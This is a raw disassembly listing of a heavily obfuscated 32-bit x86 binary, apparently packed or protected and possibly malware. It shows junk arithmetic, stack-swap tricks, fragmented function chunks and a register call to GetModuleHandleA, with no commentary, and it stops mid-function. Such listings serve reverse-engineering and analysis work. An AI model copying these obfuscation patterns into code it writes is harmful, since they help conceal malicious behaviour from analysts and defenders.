sub_424354 proc near ; CODE XREF: sub_424345+4�p
push ebp
mov ebp, esp
push offset sub_4251D3
jmp nullsub_119
sub_424354 endp
; =============== S U B R O U T I N E =======================================
sub_424361 proc near ; CODE XREF: sub_427032+E18�p
; hjohnhn9:004290B5�j
; FUNCTION CHUNK AT 0042702D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov edx, [ebp-8]
mov eax, [ebp-4]
call nullsub_3
pop ecx
pop ecx
jmp loc_42702D
sub_424361 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424377 proc near ; CODE XREF: sub_427AEB+3�j
; FUNCTION CHUNK AT 00424E8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042777F SIZE 00000011 BYTES
add esp, 0FFFFFFF8h
jmp loc_424E8A
sub_424377 endp
; ---------------------------------------------------------------------------
add eax, 8E0D00EBh
jmp sub_424D25
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_42438A: ; CODE XREF: sub_4278DC-277D�j
push esi
push 0CBBD7B78h
pop esi
rol esi, 0Bh
and esi, 62155165h
jmp loc_42809A
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_42439F: ; CODE XREF: sub_4244F5:loc_4290DF�j
call sub_427F90
cmp eax, [ebp-8]
jnz loc_426F70
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
jmp loc_4274F7
; END OF FUNCTION CHUNK FOR sub_4244F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42345B
loc_4243BD: ; CODE XREF: sub_42345B:loc_426FCF�j
mov ebp, esp
push edi
push 0C7AA9249h
xchg eax, [esp+0Ch+var_C]
jmp loc_428522
; END OF FUNCTION CHUNK FOR sub_42345B
; ---------------------------------------------------------------------------
cmp eax, edx
jmp loc_426597
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_4243D4: ; CODE XREF: sub_4237F4+125C�j
or edi, ecx
shr edi, 18h
loc_4243D9: ; CODE XREF: hjohnhn9:loc_425EB4�j
; sub_4237F4:loc_426B2F�j
call sub_424877
mov edx, 19CFC62Bh
call sub_4279ED
call sub_426DFB
loc_4243ED: ; CODE XREF: sub_424631+2276�j
jmp loc_4233E6
; END OF FUNCTION CHUNK FOR sub_4237F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_4243F2: ; CODE XREF: sub_42304F:loc_426833�j
; sub_427810:loc_42781A�j
mov eax, ebx
pop ecx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278EC
loc_4243F7: ; CODE XREF: sub_4278EC:loc_427D42�j
; sub_4278EC+5CC�j
mov eax, ds:dword_423944
mov al, [eax]
sub al, 99h
jmp loc_42740A
; END OF FUNCTION CHUNK FOR sub_4278EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424831
loc_424405: ; CODE XREF: sub_424831:loc_4276B6�j
add esi, 25EFCEBCh
mov [esi], eax
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_424831
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F90
loc_42440F: ; CODE XREF: sub_427F90+FF9�j
jmp loc_428496
; END OF FUNCTION CHUNK FOR sub_427F90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_424414: ; CODE XREF: sub_423B05+F�j
rol eax, 11h
push eax
jmp loc_424B3F
; END OF FUNCTION CHUNK FOR sub_423B05
; =============== S U B R O U T I N E =======================================
sub_42441D proc near ; CODE XREF: hjohnhn9:00424C07�j
; sub_425029+3976�p
; FUNCTION CHUNK AT 00423031 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042674F SIZE 00000013 BYTES
xchg eax, [esp+0]
pop eax
jnz loc_423031
mov eax, [ebp-8]
jmp loc_42674F
sub_42441D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42442F proc near ; DATA XREF: sub_426A78:loc_42377B�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424F52 SIZE 00000005 BYTES
rol eax, 11h
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
call sub_4244F5
jmp loc_424F52
sub_42442F endp
; ---------------------------------------------------------------------------
test ebx, eax
jmp loc_4280AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_424449: ; CODE XREF: sub_4265CD-3090�j
jz sub_423AAF
jmp loc_426B68
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_424454: ; CODE XREF: sub_425BD2+3439�j
jz loc_428771
cmp ebx, edi
jmp loc_42477C
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
jnp loc_4268A4
jmp loc_423C39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_42446C: ; CODE XREF: sub_4279C0-1B31�j
call sub_42851A
mov edx, [ebp+arg_0]
mov eax, [edx]
add edx, 4
mov edx, [edx]
jmp loc_4263B1
; END OF FUNCTION CHUNK FOR sub_4279C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427032
loc_424480: ; CODE XREF: sub_427032:loc_423806�j
mov ebx, [eax+4]
mov eax, [eax]
jnz loc_427039
retn
; ---------------------------------------------------------------------------
loc_42448C: ; CODE XREF: sub_427032:loc_427039�j
call sub_424D25
loc_424491: ; CODE XREF: sub_427AEB+12�j
jmp loc_427E3F
; END OF FUNCTION CHUNK FOR sub_427032
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_424496: ; CODE XREF: sub_427C9B-485C�j
jz loc_425076
test eax, ecx
jmp loc_4246F4
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279ED
loc_4244A3: ; CODE XREF: sub_4279ED:loc_424C76�j
xor eax, eax
mov [ebp+var_C], eax
push offset loc_424BF2
jmp loc_424AA9
; END OF FUNCTION CHUNK FOR sub_4279ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CB3
loc_4244B2: ; CODE XREF: sub_425CB3-1BD2�j
push 0
mov edx, esp
push ecx
adc ecx, esi
jmp loc_42383A
; END OF FUNCTION CHUNK FOR sub_425CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_4244BE: ; CODE XREF: sub_424631:loc_4232F2�j
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
mov edx, [ebp+8]
jmp loc_4264F5
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E4F
loc_4244D3: ; CODE XREF: sub_424E4F:loc_42634F�j
cmp [ebp+var_1], 0
jz loc_428728
mov [ebp+var_8], 1
loc_4244E4: ; CODE XREF: sub_42392D+151D�j
; sub_424E4F+3D36�j
mov eax, [ebp+var_8]
pop ecx
pop ecx
call sub_428718
loc_4244EE: ; CODE XREF: sub_425F3F:loc_423456�j
; hjohnhn9:00424BF6�j ...
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424E4F
; =============== S U B R O U T I N E =======================================
sub_4244F5 proc near ; CODE XREF: sub_428788:loc_423610�p
; sub_42442F+9�p ...
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00424238 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042439F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00424A39 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00424AF9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00425E44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042681D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004274F7 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 004290DF SIZE 00000005 BYTES
call sub_424D38
loc_4244FA: ; CODE XREF: hjohnhn9:004235AB�j
; sub_4284CB+4�p
xchg ecx, [esp+0]
pop ecx
adc edx, [esp-4+arg_4]
jno loc_424A39
add esp, 8
mov eax, [eax]
call sub_4241F3
loc_424512: ; CODE XREF: sub_427C9B-2C�j
jmp loc_424238
sub_4244F5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_424517: ; CODE XREF: sub_425BD2+14�j
jmp loc_423F21
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_42451C: ; CODE XREF: sub_427C9B-2192�j
jmp loc_429112
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_424521: ; CODE XREF: sub_424161-102�j
jmp sub_42345B
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426211
loc_424526: ; CODE XREF: sub_426211:loc_4250CF�j
; hjohnhn9:004250E4�j
add edi, 8BC39D66h
sub edi, 6F24657h
and edi, 366FF2Bh
push offset sub_42790F
jmp loc_42765C
; END OF FUNCTION CHUNK FOR sub_426211
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_424542: ; CODE XREF: sub_42466E-660�j
xchg ebx, [ebp+0]
mov ebp, ebx
test edx, 804613E9h
jmp loc_42402C
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
add eax, edx
mov eax, [eax]
add eax, [ebp-4]
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
jmp loc_423408
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424564 proc near ; DATA XREF: sub_428436�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424E05 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00426402 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00426547 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042755C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427F75 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
loc_42456D: ; CODE XREF: sub_424564+2FFB�j
jb loc_424E05
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
jmp loc_427F75
sub_424564 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_42457E: ; CODE XREF: sub_424161+106D�j
jnz loc_4284EE
jl loc_428326
jmp loc_4284ED
; ---------------------------------------------------------------------------
loc_42458F: ; CODE XREF: sub_424161:loc_427BEE�j
pop edx
xor edx, 2B03DDE2h
rol edx, 3
jnb loc_42605A
xchg edx, eax
jle loc_42312B
jmp loc_4271FD
; END OF FUNCTION CHUNK FOR sub_424161
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xchg edx, [ecx]
test ebp, 3765BA79h
jmp loc_423542
; =============== S U B R O U T I N E =======================================
sub_4245BA proc near ; CODE XREF: sub_424698:loc_423AE4�p
; hjohnhn9:00424886�j
; FUNCTION CHUNK AT 0042802C SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-4]
movzx eax, word ptr [eax+6]
mov [ebp-10h], eax
push offset loc_4272B3
jmp loc_42802C
sub_4245BA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_4245D2: ; CODE XREF: sub_427564-575�j
or ebx, 68CF1599h
add esi, ebp
jmp sub_427DE6
; END OF FUNCTION CHUNK FOR sub_427564
; ---------------------------------------------------------------------------
loc_4245DF: ; CODE XREF: hjohnhn9:004242F4�j
push 6EB72A16h
pop ecx
rol ecx, 6
xor ecx, 51481A26h
and ecx, 0B49990B4h
rol ecx, 6
add ecx, 0E01E531Dh
jmp loc_428EC5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_424603: ; CODE XREF: sub_42851A-616�j
jmp sub_4279ED
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427166
loc_424608: ; CODE XREF: sub_427166+E�j
pop esi
rol esi, 12h
xor esi, 0E0F3CFF4h
sub esi, 0D1A215BAh
and esi, 0E378881Fh
add esi, 0BE3237CCh
xchg esi, [esp+4+var_4]
jmp sub_4244F5
; END OF FUNCTION CHUNK FOR sub_427166
; ---------------------------------------------------------------------------
loc_42462C: ; CODE XREF: hjohnhn9:00425DD9�j
call sub_426D17
; =============== S U B R O U T I N E =======================================
sub_424631 proc near ; CODE XREF: hjohnhn9:00424BED�j
; sub_428477-1C90�p
; FUNCTION CHUNK AT 004230C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423180 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004232F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004233F8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423662 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042368D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423B9C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00423ED7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00423F3D SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00424314 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004244BE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004249A3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424CAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424F09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424F28 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425164 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00425235 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425B0E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004264F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426535 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426619 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00426650 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426894 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042692F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00426E35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042708C SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0042729D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004276C5 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004277A2 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00427970 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427D89 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427DB3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428124 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042839C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428567 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428BE3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C75 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428DD1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428E16 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
jnz loc_42879B
call nullsub_2
call sub_424877
jmp loc_428124
sub_424631 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424877
loc_42464A: ; CODE XREF: sub_424877:loc_4288F3�j
mov ebp, esp
jnz loc_4265EE
add esp, 0FFFFFFECh
push offset loc_424300
loc_42465A: ; CODE XREF: hjohnhn9:loc_428351�j
jmp loc_42792C
; END OF FUNCTION CHUNK FOR sub_424877
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_42465F: ; CODE XREF: sub_423BC3:loc_424C7B�j
mov edx, [edx]
xchg edx, [esp-8+arg_4]
push dword ptr [ebp+8]
call eax ; GetModuleHandleA
jmp loc_42713A
; END OF FUNCTION CHUNK FOR sub_423BC3
; =============== S U B R O U T I N E =======================================
sub_42466E proc near ; CODE XREF: hjohnhn9:004230C4�p
; hjohnhn9:004269FE�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042309F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042384C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423BB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424008 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042402C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042424B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424542 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424BD9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425091 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00425D3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425DA9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426433 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00427947 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042797F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427DC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042857C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004289F8 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov edx, [edx]
add eax, edx
pop edx
push eax
mov eax, ebx
xchg eax, [esp+0]
jmp loc_42384C
sub_42466E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov dword ptr [ebp-4], 1
push 0E4AEB5DAh
push offset sub_4251EB
jmp loc_4230A5
; =============== S U B R O U T I N E =======================================
sub_424698 proc near ; CODE XREF: sub_424A78+4�p
; sub_428162+4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004238FE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00423928 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423AD2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424153 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004241A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424757 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00424F4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425001 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00425C56 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004261CF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042646F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00427657 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042893A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428BE8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428E07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E1B SIZE 00000010 BYTES
push ebp
call sub_423F77
loc_42469E: ; CODE XREF: sub_427994-8A�j
jmp loc_42646F
sub_424698 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4290CF
loc_4246A3: ; CODE XREF: sub_4290CF-2157�j
jmp nullsub_97
; END OF FUNCTION CHUNK FOR sub_4290CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_4246A8: ; CODE XREF: sub_427C9B+29�j
ror ebp, 1Dh
loc_4246AB: ; CODE XREF: sub_427C9B:loc_427CB3�j
xor edx, 0B4557C7Dh
push offset loc_4230BC
jmp nullsub_129
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423AAF
loc_4246BB: ; CODE XREF: sub_423AAF+1E�j
add esi, 77C34538h
xchg esi, [esp+4+var_4]
jmp loc_428027
; END OF FUNCTION CHUNK FOR sub_423AAF
; ---------------------------------------------------------------------------
loc_4246C9: ; DATA XREF: sub_425BD2+1684�o
inc dword ptr [ebp-4]
cmp dword ptr [ebp-10h], 0
jge loc_424788
jmp loc_4251A7
; =============== S U B R O U T I N E =======================================
sub_4246DB proc near ; CODE XREF: sub_4262C5:loc_423288�p
; sub_427C9B+30�j
; FUNCTION CHUNK AT 004250AF SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push ebp
mov ebp, esp
push ecx
push offset loc_427E2F
jmp loc_4250AF
sub_4246DB endp
; ---------------------------------------------------------------------------
loc_4246ED: ; CODE XREF: hjohnhn9:loc_428C28�j
mov edi, ecx
call sub_4249E1
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_4246F4: ; CODE XREF: sub_427C9B-37FD�j
ja loc_4278C0
sub ecx, ebx
push ecx
jmp loc_427C61
; END OF FUNCTION CHUNK FOR sub_427C9B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_424703: ; CODE XREF: sub_427AC0-2DB4�j
xchg eax, ecx
loc_424705: ; CODE XREF: sub_427AC0:loc_424D04�j
sub eax, 2E16C343h
xor eax, 0D66B12EEh
and eax, 6022EF0Fh
jmp loc_425C3B
; END OF FUNCTION CHUNK FOR sub_427AC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_42471C: ; CODE XREF: sub_42851A-4E85�j
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4275B2
loc_42471E: ; CODE XREF: sub_4275B2+13�j
jmp nullsub_130
; END OF FUNCTION CHUNK FOR sub_4275B2
; ---------------------------------------------------------------------------
loc_424723: ; CODE XREF: hjohnhn9:00426ABE�j
jmp locret_4265BD
; ---------------------------------------------------------------------------
loc_424728: ; CODE XREF: hjohnhn9:00423BFD�j
jmp loc_427358
; =============== S U B R O U T I N E =======================================
sub_42472D proc near ; CODE XREF: sub_4279C0-1A5E�p
push offset sub_4249BF
jmp nullsub_9
sub_42472D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_424737: ; CODE XREF: sub_4265CD+B�j
pop ebp
push 0E7122127h
pop eax
or eax, 0C64C46DCh
jnz loc_424045
or ebp, edx
or eax, 356DC62Fh
jmp loc_42403E
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_424757: ; CODE XREF: sub_424698:loc_428E07�j
xchg edi, [esp+4+var_4]
mov ebp, edi
pop edi
mov eax, ds:dword_423390
jmp loc_424F4D
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
loc_424768: ; DATA XREF: sub_423B05+4AF9�o
call sub_424771
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_42476D: ; CODE XREF: sub_425BD2:loc_423082�j
; hjohnhn9:00424107�j ...
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_425BD2
; =============== S U B R O U T I N E =======================================
sub_424771 proc near ; CODE XREF: hjohnhn9:loc_424768�p
; sub_423B05+15B2�p
push eax
push offset loc_426AAD
jmp sub_42911C
sub_424771 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_42477C: ; CODE XREF: sub_425BD2-1776�j
jb nullsub_95
sbb ecx, 110A6425h
loc_424788: ; CODE XREF: hjohnhn9:004246D0�j
; sub_426C09+8�j ...
jz loc_426F03
mov eax, [ebp-10h]
mov al, [ebp+eax-20h]
mov edx, [ebp-4]
mov [edx], al
push offset sub_426827
jmp loc_4266A6
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426708
loc_4247A4: ; CODE XREF: sub_426708:loc_426311�j
; sub_426708+254�j
push eax
push 0F61C2176h
pop eax
rol eax, 14h
add eax, 0E8D2D426h
jmp loc_4283D8
; END OF FUNCTION CHUNK FOR sub_426708
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_4247B9: ; CODE XREF: sub_426A30+1E94�j
mov ebx, [ebx+ecx]
loc_4247BC: ; CODE XREF: sub_426A30+5E4�j
call sub_42873F
loc_4247C1: ; CODE XREF: sub_426A30-379A�j
; sub_426A30:loc_426FF4�j ...
js loc_4248F1
mov ecx, [ebx+3Ch]
jmp loc_423126
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428192
loc_4247CF: ; CODE XREF: sub_428192+B�j
push offset loc_42312B
jmp nullsub_109
; END OF FUNCTION CHUNK FOR sub_428192
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282F8
loc_4247D9: ; CODE XREF: sub_4282F8+C�j
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+arg_0]
test byte ptr [eax-8], 8
setnz al
call sub_42392D
jmp loc_426189
; END OF FUNCTION CHUNK FOR sub_4282F8
; =============== S U B R O U T I N E =======================================
sub_4247F4 proc near ; CODE XREF: hjohnhn9:004276F2�p
; hjohnhn9:0042770F�j
; FUNCTION CHUNK AT 0042634A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004263F6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426D4F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00428A7E SIZE 00000019 BYTES
xchg eax, [esp+0]
pop eax
loc_4247F8: ; CODE XREF: hjohnhn9:0042810F�j
mov al, 1
call edx
jmp loc_426D4F
sub_4247F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EA9
loc_424801: ; CODE XREF: sub_425EA9:loc_4289C0�j
jnz loc_427CE0
call sub_42351F
push offset loc_427CD8
jmp nullsub_71
; END OF FUNCTION CHUNK FOR sub_425EA9
; ---------------------------------------------------------------------------
loc_424816: ; CODE XREF: hjohnhn9:00427E70�j
rol esi, 9
; =============== S U B R O U T I N E =======================================
sub_424819 proc near ; CODE XREF: sub_426A78+C8A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423394 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423C02 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423EC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424013 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004242E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042488B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424967 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00425F9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426491 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00426875 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426A03 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426B97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426EC4 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004272E4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004273F5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427B0E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427F3A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004282C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428ED0 SIZE 0000000E BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, esp
jmp loc_427F3A
sub_424819 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A28
loc_424824: ; CODE XREF: sub_424A28�j
mov eax, ds:dword_4233C4
or eax, eax
jmp loc_4276BB
; END OF FUNCTION CHUNK FOR sub_424A28
; =============== S U B R O U T I N E =======================================
sub_424831 proc near ; DATA XREF: sub_42645D+8�o
; FUNCTION CHUNK AT 00424405 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004276B6 SIZE 00000005 BYTES
push esi
push 85CCA664h
pop esi
add esi, 0A1CD7584h
xor esi, 0E496735Ch
sub esi, 0E8B9B3D8h
jmp loc_4276B6
sub_424831 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CC8
loc_42484F: ; CODE XREF: sub_426CC8+13�j
add ecx, 1237F74h
test ecx, 100000h
jmp loc_426DCF
; END OF FUNCTION CHUNK FOR sub_426CC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_424860: ; CODE XREF: sub_42363F+264F�j
jz loc_424FB6
jmp loc_424B8A
; END OF FUNCTION CHUNK FOR sub_42363F
; =============== S U B R O U T I N E =======================================
sub_42486B proc near ; CODE XREF: sub_425029+2107�p
; hjohnhn9:0042840E�j
; FUNCTION CHUNK AT 0042836D SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
